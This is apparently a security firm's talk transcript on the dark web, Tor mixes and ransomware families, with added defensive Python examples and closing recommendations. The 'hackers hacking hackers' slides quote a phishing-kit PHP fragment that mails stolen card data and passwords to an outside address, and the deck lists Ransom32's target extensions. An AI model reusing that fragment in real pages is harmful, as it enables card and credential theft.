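Each behaviour is counted once per run, so a sample that deletes shadow copies twenty times does not score higher than one that does it once; what raises the score is the combination of independent behaviours, which is also what makes the verdict robust against the permutation-based AV evasion described earlier on the page.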
Another slightly newer variant – also unique…
Encrypted files
Payment instructions – with help on Bitcoins via YouTube
The Bitcoin address is unique
TOR - Combination of several ”mixes”
• Objective: Establish an infrastructure that is not vulnerable to traffic analysis
• Concept: Combination of mixes and proxies
• Uses public-key cryptography to establish connections
• Uses symmetric keys for the communication
• Same concept as known from SSL/TLS proxies
• Use of several mixes to ensure a varied network
• Mixes (blenders)
• Receive encrypted input from different senders
• Decryption and forwarding happen in random order
• An observer cannot see which output corresponds to which input
• As long as a single server works correctly and is not compromised, anonymity is preserved
• Drawback: Expensive and slow public-key encryption
Figure: messages from senders A, B and C pass through a chain of mixes; it is impossible to determine which message comes from which sender
How do you get onto the Tor network?
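A simplified model of the mix cascade described above, as an added example that is not part of the talk: the sender wraps a padded message in one encryption layer per mix, each mix strips its layer and forwards the whole batch in a secret random order, and an observer comparing the batch entering the first mix with the batch leaving the last one cannot tell which output came from which sender. The per-hop cipher here is an HMAC-SHA256 keystream with a fresh nonce per layer, standing in for the symmetric session keys that Tor negotiates with public-key cryptography; the mix keys and messages are constructed. Padding every message to the same size handles the case where message length alone would link input to output.

```python
import hashlib
import hmac
import random

NONCE_LEN = 16
BLOCK = 64   # every payload is padded to this size so length cannot link input to output

def keystream_xor(key, data, nonce):
    """Toy per-hop cipher: XOR with an HMAC-SHA256 keystream derived from (key, nonce).
    It stands in for the symmetric session key a real mix agrees with the sender
    via public-key cryptography; the same call encrypts and decrypts."""
    stream = b""
    counter = 0
    while len(stream) < len(data):
        stream += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))

def pad(payload):
    """Length-prefix and zero-pad the payload to BLOCK bytes."""
    if len(payload) > BLOCK - 2:
        raise ValueError("payload too long for one block")
    body = len(payload).to_bytes(2, "big") + payload
    return body + b"\x00" * (BLOCK - len(body))

def unpad(block):
    return block[2:2 + int.from_bytes(block[:2], "big")]

def wrap_layer(hop_key, inner, rng):
    """Add one encryption layer with a fresh nonce (no keystream reuse between messages)."""
    nonce = rng.getrandbits(8 * NONCE_LEN).to_bytes(NONCE_LEN, "big")
    return nonce + keystream_xor(hop_key, inner, nonce)

def unwrap_layer(hop_key, blob):
    nonce, body = blob[:NONCE_LEN], blob[NONCE_LEN:]
    return keystream_xor(hop_key, body, nonce)

def build_onion(hop_keys, payload, rng):
    """The sender wraps the padded payload once per mix, innermost layer for the last mix."""
    blob = pad(payload)
    for key in reversed(hop_keys):
        blob = wrap_layer(key, blob, rng)
    return blob

class Mix:
    def __init__(self, key, rng):
        self.key, self.rng = key, rng

    def process(self, batch):
        """Strip one layer from every message, then forward the batch in a secret random order."""
        stripped = [unwrap_layer(self.key, b) for b in batch]
        self.rng.shuffle(stripped)
        return stripped

def run_cascade(hop_keys, payloads, seed):
    """Return the batch as an observer sees it before each mix and after the last one."""
    rng = random.Random(seed)
    batch = [build_onion(hop_keys, p, rng) for p in payloads]   # senders' order is visible here
    hops = [batch]
    for key in hop_keys:
        batch = Mix(key, rng).process(batch)
        hops.append(batch)
    return hops

def demo(seed=7):
    # Constructed mix keys and sender messages (not from the talk).
    hop_keys = [hashlib.sha256(name).digest() for name in (b"mix-1", b"mix-2", b"mix-3")]
    payloads = [b"A: pay 1 BTC", b"B: hello", b"C: the quick brown fox"]
    hops = run_cascade(hop_keys, payloads, seed)
    return hops[0], [unpad(b) for b in hops[-1]]

if __name__ == "__main__":
    inputs, outputs = demo()
    print("input lengths:", [len(b) for b in inputs])
    print("output order :", outputs)
```

If all mixes but one are compromised, the observer knows all but one of the permutations, and that single unknown shuffle still leaves every pairing of sender and output equally likely; this is the "one honest server suffices" property from the slide. The cost the slide mentions is visible too: every layer needs its own key agreement, which in the real network is a public-key operation per hop.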
What is the Dark Web used for? (2015)
TOP 5
Guns, bullets and weapons
Booom ?
Drugs
Need a Drivers license ?
Stepstones and rooted servers
RDP, VNC, NX you name it..
Remote Desktop Access
Bots and Botnets
Zeus Botnet
for only $7.56
Access via proxy, socks, and to loaders and phishing..
The Dark Forums.
Hacking the hackers
Inside many of the
folders were files
like “css.gif”
…and it was not
an image!
Behind the codes - Hackers hacking hackers..
$zaz = 'reszult@yahoo.com';
PSW : $theAccountPW
…
CardHolder : $chold
CardNumber : $cnum
ExpiryDate : $exp
CVC : $cvv
$subject = "RZ # $date # $time";
$headers = "From: VbV Full Info<EMAIL-REMOVED@yahoo.fr>";
$headers .= $_POST['eMailAdd']."\n";
mail($zaz,$subject,$log,$headers);
Dropping files
Virus maker kits for free (backdoored)
TOX – Free Ransomware Toolkit
Ransomware as a service.
TOX – Free Ransomware Toolkit
• 'Tox' Offers Free build-your-own Ransomware
Malware Toolkit.
• Tox is completely free to use.
• One dark web hacker has released this for anyone to
download and set up their own ransomware for free.
• Tox, which runs on TOR, requires not much technical
skills to use.
• It is designed in such a way that almost anyone can
easily deploy ransomware in three simple steps.
• Once a user registers with the site, they follow these three simple steps to create their own malware:
• Type a desired ransom amount you want to ask
victims for.
• Provide an additional note in the "Cause", the
message that will alert victims that they are being
held hostage to a piece of malware.
• Finally, you are prompted to fill out a captcha, and
click "Create".
"This process creates an executable of about 2MB that is disguised as a
.scr file. Then the Tox [users] distribute and install as they see fit. The Tox
site (runs on the TOR network) will track the installs and profit. To withdraw
funds, you need only supply a receiving Bitcoin address.”
- McAfee explains.
RaaS - Next generation ”Ransomware as a service”
Cryptolocker/CTB-Locker/CryptoWall etc..
4.61299511 Bitcoins ~= DKK 10,000
Source: http://malware.dontneedcoffee.com
Cryptolocker/CTB-Locker/CryptoWall etc..
Figure: infections by country and date
http://malware.dontneedcoffee.com
Cryptolocker/CTB-Locker/CryptoWall etc..
Source: http://malware.dontneedcoffee.com
When sharing becomes too much…
• In mid-August the Turkish security group Utku Sen published open source code for the ransomware “Hidden Tear” on GitHub
• Hidden Tear uses AES encryption and can evade common AV platforms
• Utku Sen also published a short video demonstrating how the ransomware worked.
While this may be helpful for some, there are significant risks. Hidden tear may be used only for Educational Purposes. Do not use it as a ransomware! You could go to jail on obstruction of justice charges just for running hidden tear, even though you are innocent.
• … but
• Not everyone on the internet obeys this warning
• Trend Micro discovered a hacked website in Paraguay
• Distributing ransomware detected as RANSOM_CRYPTEAR.B.
• The ransomware was created using modified Hidden Tear code
http://blog.trendmicro.rsvp1.com/trendlabs-security-intelligence/a-case-of-too-much-informationransomware-code-shared-publicly-for-educational-purposes-used-maliciously-anyway
http://www.trendmicro.rsvp1.com/vinfo/us/threat-encyclopedia/malware/ransom_cryptear.b
What is the development around ransomware? (1/2)
Current status and trends
• Current data shows that almost 70% of incidents hit small and medium-sized businesses, followed by large companies and private individuals – though there is probably a large number of unreported cases behind the statistics
• More different file types than before are hit – in order to hit more victims, and to hit particular file types of great value to the victim, e.g. saved-game files for gamers and CAD drawings in an engineering company or design studio
• Crypto ransomware has become more business-oriented – previously it was primarily aimed at private individuals, but newer versions go after ”professional” file types and network drives (e.g. CryptoFortress) and demand a higher ransom
• Ransomware with ”network worm” functionality, i.e. spreading internally in companies to all servers and clients – potential for much greater damage and extortion of larger amounts
• Theft of data followed by extortion under threat of publishing personal and sensitive data on the Internet
• Criminals (cyber mafia) will deliberately attack consulting firms and public authorities with ransomware and extort large sums from organisations that do not want their business disrupted or their intellectual property compromised
• Most crypto ransomware calls itself CryptoLocker – simply to use the ”brand” name that Cryptolocker has built up
What is the development around ransomware? (2/2)
Current status and trends
• File names are encrypted so that it becomes harder to see what has been encrypted. Unique encryption key for each file
• Crypto ransomware has gone "freemium": decrypt a couple of files for free to convince victims that they will actually get access to their data if they pay
• ”Offline” encryption, i.e. the encryption can start without the client having Internet access
• Newer Cryptolocker deletes Volume Shadow copies (Windows' built-in backup function) so that the victim cannot restore data that way
• New dormant and obfuscated ransomware variants that encrypt data covertly
• Still allow access to the data
• Wait until a backup has been made (so the backup also contains encrypted data)
• Then the encryption key is removed and a (very large) ransom is demanded
• Ransomware-as-a-service hosted on the TOR network, and the use of Bitcoin for ransom payment, make it easy to get started as a cyber criminal
Ransomware attacks doubled in 2015
Over half (54%) of all malware targeting UK users in 2015 contained some form of ransomware.
Ransom32: JavaScript-only Ransomware-as-a-Service (RaaS)
• Fully developed in JavaScript, HTML and CSS using NW.js (http://nwjs.io/)
• Potentially allows for multi-platform infections after repackaging for Linux and Mac OS X
• Do not confuse Java and JavaScript
  • Java: object-oriented programming language, originally developed by Sun and now owned by Oracle
  • JavaScript: object-oriented client-side scripting language that is implemented in the browser
• NW.js bundles node.js, standard JavaScript scripts, and Chromium into a single executable
• Chrome executes and launches the JavaScript scripts
• The malware package is a self-extracting RAR file of 22MB which expands to over 67MB
• NW.js is a legitimate framework, so antivirus signature coverage is very bad
• No administrative rights necessary
• Runs under the security context of the user
All you need to get your own customized ransomware is a Bitcoin address to send your earnings to
Sources: http://blog.emsisoft.com/2016/01/01/meet-ransom32-the-first-javascript-ransomware/
http://www.computerworld.com/article/3018972/security/ransom32-first-of-its-kind-javascript-based-ransomware-spotted-in-the-wild.html
Ransom32 - Unwrapping the behemoth
• Automatically unpacks using the script language implemented in WinRAR
• Executes the “chrome.exe” file contained in the archive
• “chrome” contains a copy of the GPL license agreement.
• “chrome.exe” is a packaged NW.js application and contains the actual malware code as well as the framework required to run the malware.
• “ffmpegsumo.dll”, “nw.pak”, “icudtl.dat” and “locales” contain data that are required by the NW.js framework to function properly.
• “rundll32.exe” is a renamed copy of the Tor client.
• “s.exe” is a renamed copy of Optimum X Shortcut, a utility to create and manipulate Desktop and start menu shortcuts.
• “g” contains the malware’s configuration information as configured in the web interface.
• “msgbox.vbs” is a small script that displays a customizable popup message and is used to display the configured message box.
• “u.vbs” is a small script that enumerates and deletes all files and folders in a given directory.
The content of the Ransom32 SFX archive
The “g” file contains the malware’s configuration formatted as JSON
Ransom32
Files with the following file extensions are being targeted:
*.jpg, *.jpeg, *.raw, *.tif, *.gif, *.png, *.bmp, *.3dm, *.max,
*.accdb, *.db, *.dbf, *.mdb, *.pdb, *.sql, *.*sav*, *.*spv*,
*.*grle*, *.*mlx*, *.*sv5*, *.*game*, *.*slot*, *.dwg, *.dxf,
*.c, *.cpp, *.cs, *.h, *.php, *.asp, *.rb, *.java, *.jar, *.class,
*.aaf, *.aep, *.aepx, *.plb, *.prel, *.prproj, *.aet, *.ppj, *.psd,
*.indd, *.indl, *.indt, *.indb, *.inx, *.idml, *.pmd, *.xqx, *.xqx,
*.ai, *.eps, *.ps, *.svg, *.swf, *.fla, *.as3, *.as, *.txt, *.doc,
*.dot, *.docx, *.docm, *.dotx, *.dotm, *.docb, *.rtf, *.wpd,
*.wps, *.msg, *.pdf, *.xls, *.xlt, *.xlm, *.xlsx, *.xlsm, *.xltx,
*.xltm, *.xlsb, *.xla, *.xlam, *.xll, *.xlw, *.ppt, *.pot, *.pps,
*.pptx, *.pptm, *.potx, *.potm, *.ppam, *.ppsx, *.ppsm,
*.sldx, *.sldm, *.wav, *.mp3, *.aif, *.iff, *.m3u, *.m4u, *.mid,
*.mpa, *.wma, *.ra, *.avi, *.mov, *.mp4, *.3gp, *.mpeg,
*.3g2, *.asf, *.asx, *.flv, *.mpg, *.wmv, *.vob, *.m3u8, *.csv,
*.efx, *.sdf, *.vcf, *.xml, *.ses, *.dat
The malware will not attempt to encrypt any files if they are located in a directory that contains any of the following strings:
:\windows\
:\winnt\
programdata\
boot\
temp\
tmp\
$recycle.bin\
Ransom32
A web interface allows you to see how many systems the malware has infected, how many Bitcoins it earned, and allows you to further customize the malware
The ransom note displayed by the malware
Ransomweb
Ransomweb that encrypts websites and web servers
High-Tech Bridge:
• In December 2014, our security experts discovered a very interesting case of a financial company website compromise: the website was out of service displaying a database error, while the website owner got an email asking for a ransom to “decrypt the database”. The web application in question was pretty simple and small, but very important for the business of the company, which could not afford to suspend it, nor to announce its compromise.
• Careful investigation that we performed revealed the following:
• The web application was compromised six months ago; several server scripts were modified to encrypt data before inserting it into the database, and to decrypt it after getting data from the database. A sort of “on-the-fly” patching invisible to web application users.
• Only the most critical fields of the database tables were encrypted (probably not to impact web application performance a lot). All previously existing database records were encrypted accordingly.
• The encryption key was stored on a remote web server accessible only via HTTPS (probably to avoid key interception by various traffic monitoring systems).
• During six months, the hackers were silently waiting, while backups were being overwritten by the recent versions of the database.
• On day X, the hackers removed the key from the remote server. The database became unusable, the website went out of service, and the hackers demanded a ransom for the encryption key.
RansomWeb: Crooks Start Encrypting Websites And Demanding Thousands Of Dollars From Businesses
Thomas Fox-Brewster Jan 28, 2015 @ 07:36 AM
In another startling development in the world of cyber crime, malicious hackers have started taking over website servers, encrypting the data on them and demanding payment to unlock the files. A large European financial services company, whose name was not disclosed, was the first known victim of this potentially business-destroying attack, according to Swiss security firm High-Tech Bridge, which investigated the breach in December 2014.
The security firm labelled the attack RansomWeb. The brazen techniques used and the high ransom represent a more aggressive take on ransomware – malware which encrypted people’s PCs and asked for payment, typically between $100 and £1,000. Though only a handful of attacks have been seen, many expect such extortion to grow rapidly in 2015. The initial attack started six months prior to the victim’s website being shut down by the hackers, who were surreptitiously locking up the most critical data on the server using “on-the-fly” tweaks to the site’s PHP code functions. The criminals stored the key to decrypt the data on their own remote web server accessible only via HTTPS encrypted communications, supposed to guarantee no one with visibility on those connections could get access to the data but them. As soon as they pulled the key and data was no longer being silently encrypted and decrypted, the website was knocked out of action. That’s when employees at the financial services firm were sent emails from a Gmail account, demanding the firm pay $50,000 to get their website back. They threatened to increase the price by 10 per cent with every passing week.
http://www.forbes.com/sites/thomasbrewster/2015/01/28/ransomweb-50000-dollar-extortion/
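Both the RansomWeb case above and the dormant ransomware variants described earlier let the victim's own backups fill up with ciphertext before the key is pulled, so a restore test that only checks that the dump loads proves nothing. The following added example (not from the talk or from High-Tech Bridge) samples rows from a restored backup and flags columns whose values look like stored ciphertext instead of readable text; table, column names and row contents are constructed sample data, and the ciphertext-detection rule is a heuristic to be tuned for the schema at hand.

```python
"""Plaintext sanity check for a restored backup. Added example, not from the
talk: RansomWeb and the dormant ransomware variants wait until backups hold
ciphertext too, so a restore test must look at content, not only at whether
the dump loads. Table, column names and rows are constructed sample data."""
import base64, binascii, re

_B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

def looks_like_ciphertext(value: str) -> bool:
    """Heuristic for the common base64(AES-CBC) storage pattern: base64
    alphabet, 16-byte aligned payload, not decodable as UTF-8 text."""
    if len(value) < 24 or not _B64_RE.match(value):
        return False
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    if len(raw) % 16:
        return False
    try:
        raw.decode("utf-8")
        return False          # readable text, e.g. a legitimately base64-encoded note
    except UnicodeDecodeError:
        return True           # block-aligned binary: looks like stored ciphertext

def suspicious_columns(rows, threshold=0.5):
    """Return {column: fraction} for text columns where at least `threshold`
    of the non-empty values look encrypted."""
    hits, totals = {}, {}
    for row in rows:
        for col, val in row.items():
            if isinstance(val, str) and val:
                totals[col] = totals.get(col, 0) + 1
                hits[col] = hits.get(col, 0) + looks_like_ciphertext(val)
    return {c: hits[c] / totals[c] for c in totals if hits[c] / totals[c] >= threshold}

def _fake_ciphertext(seed: int) -> str:
    # Constructed 32-byte stand-in for two AES blocks; not real cryptography.
    raw = bytes((i * 73 + 131 + seed) % 256 for i in range(32))
    return base64.b64encode(raw).decode("ascii")

# Constructed rows as restored from a dump: the 'iban' column was silently
# encrypted by the modified server scripts; the other columns are still plain.
SAMPLE_ROWS = [{"id": i, "email": f"user{i}@example.com",
                "iban": _fake_ciphertext(i), "note": "plain customer note"}
               for i in range(6)]

if __name__ == "__main__":
    print(suspicious_columns(SAMPLE_ROWS))  # {'iban': 1.0}
```

Run it against a sample of rows from each restored backup generation and compare the flagged columns with the schema's expectation; a column that should be readable but comes back encrypted across several generations is exactly the situation the six-month wait in the case above was designed to produce.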
Android SimpleLocker
• May 2014 – SimpleLocker appears in Ukraine
• Asks for $22 USD using Monexy
• Uses TOR for C&C
• Checks the SD card for: jpeg, jpg, png, bmp, gif, pdf, doc, docx, txt, avi, mkv, 3gp, mp4
• Unlike CryptoLocker, the encryption key is hard-coded in the malware. Encrypted files are appended with “.enc”.
Recommendations
Awareness
Basic controls
Updates
Privileges
Backup
Preparation
Sandbox: emulated execution
• The collected data can be tested in a sandbox to verify whether it is malicious.
• Will reveal exploits, download of additional malware and call-back.
• Suspicious behaviour or traffic becomes visible.
Virtual Analysis
• Win 7
• Office 10
• Adobe 11
• Win XP
• Office 07
• Adobe 10
• Windows Server
What can we do? - Practical recommendations (1)
• Defence in depth: Use different and overlapping security measures, so that protection does not depend on a single point of failure in individual measures or technologies
• Basic controls: Keep focus on the basic controls, and remember the continuous follow-up
• Monitoring: Many organisations only discover a security breach when they get a call from the police or a customer. Monitoring of log files and change management can give earlier warning
• Antivirus is not enough: Antivirus still catches many attacks, but you also experience many attacks with unique malware and exploitation of zero-day vulnerabilities, which require other tools
• Endpoint protection: Endpoints must be protected by more than antivirus; remember updates, restricted privileges, web security and device control
• Patch immediately: Attackers often gain access using simple attack methods that can be defended against with an updated and well-configured IT environment and up-to-date antivirus
• Encrypt sensitive data: If data is lost or stolen, it is much harder for a criminal to misuse it
• Protect encryption keys: If the encryption keys are compromised, security is compromised too
• Two-factor authentication: This will not eliminate the risk of passwords being stolen, but it can limit the damage that can be done through misuse of stolen credentials
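The monitoring and change-management recommendation is what would have caught the RansomWeb case described earlier, where server-side scripts were modified to encrypt and decrypt data on the fly and stayed unnoticed for six months. The following added example (not from the talk) keeps a SHA-256 baseline of the deployed web application code and reports files added, removed or modified since the baseline; anything reported that has no matching change ticket is a candidate for incident response. Paths, suffixes and file contents are constructed sample data built in a temporary directory.

```python
"""Hash baseline for deployed web application code. Added example, not from
the talk: in the RansomWeb case server-side scripts were silently modified
and stayed unnoticed for six months. A baseline re-checked on a schedule and
reconciled with change tickets turns that edit into an alert. Sample data only."""
import hashlib, os, tempfile

WATCHED_SUFFIXES = (".php", ".py", ".js", ".inc", ".htaccess")

def snapshot(root: str) -> dict:
    """Map each watched file (path relative to root) to its SHA-256 digest."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(WATCHED_SUFFIXES):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                result[os.path.relpath(full, root).replace(os.sep, "/")] = \
                    hashlib.sha256(fh.read()).hexdigest()
    return result

def compare(baseline: dict, current: dict) -> dict:
    """Classify changes since the baseline. Anything listed here without a
    matching change ticket is a candidate for incident response."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }

def demo() -> dict:
    """Constructed webroot: baseline it, simulate an unsanctioned edit, compare."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "lib"))
        files = {
            "index.php": "<?php require 'lib/db.php'; ?>\n",
            "lib/db.php": "<?php function load($id) { return query($id); } ?>\n",
            "logo.png": "image placeholder, not a watched suffix",
        }
        for rel, body in files.items():
            with open(os.path.join(root, rel), "w") as fh:
                fh.write(body)
        baseline = snapshot(root)
        # Constructed change: code appended to the data-access script after deployment.
        with open(os.path.join(root, "lib", "db.php"), "a") as fh:
            fh.write("// appended after deployment\n")
        return compare(baseline, snapshot(root))

if __name__ == "__main__":
    print(demo())  # {'added': [], 'removed': [], 'modified': ['lib/db.php']}
```

In production the baseline should be stored off the web server (an attacker who can edit the scripts can edit a local baseline too) and regenerated only as part of an approved deployment.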
What can we do? - Practical recommendations (2)
• People: Awareness is still important. Teach your employees the importance of security, how to spot an attack, and what to do when they see something suspicious
• Keep access to data on a "need-to-know" level: Restrict access to the systems to the necessary personnel. Make sure processes are in place to revoke access again when people change role or job
• Remember physical security: Not all data theft happens online. Criminals will tamper with computers or payment terminals, or steal documents
• Backup: If all other measures fail, a backup can save the data. Remember to protect the backup media…
• Incident response: Plan for incidents to happen; follow up continuously on how, and how quickly, incidents are detected and handled, so that the response can be improved over time
• Follow-up: Do not forget the basic controls. Keep focus on better and faster detection through a mix of people, processes and technology
• Threat landscape: Keep an eye on the threat landscape so that the security solution can be adjusted continuously. Remember that "one size fits all" does not hold in reality
• Risk assessment: If you are a target of actual espionage, do not underestimate the persistence, expertise and tools of your adversary
Risk mitigation
• The risk cannot be removed, only limited
• Security cannot be bought as a product
• Security is achieved through a mix of
  • Procedures & management (management issues)
  • Design, tools and technical solutions
  • Continuous monitoring and maintenance
• Result: Formulation of a security policy and implementation of a security system
Stay up to date
Subscribe to Dubex's newsletter
Visit
www.dubex.dk
www.dubex.dk/update/
Follow Dubex on LinkedIn & Twitter
Attend Dubex's events
twitter.com/Dubex
www.linkedin.com/company/dubex-as
http://www.dubex.dk/arrangementer/
Thank you!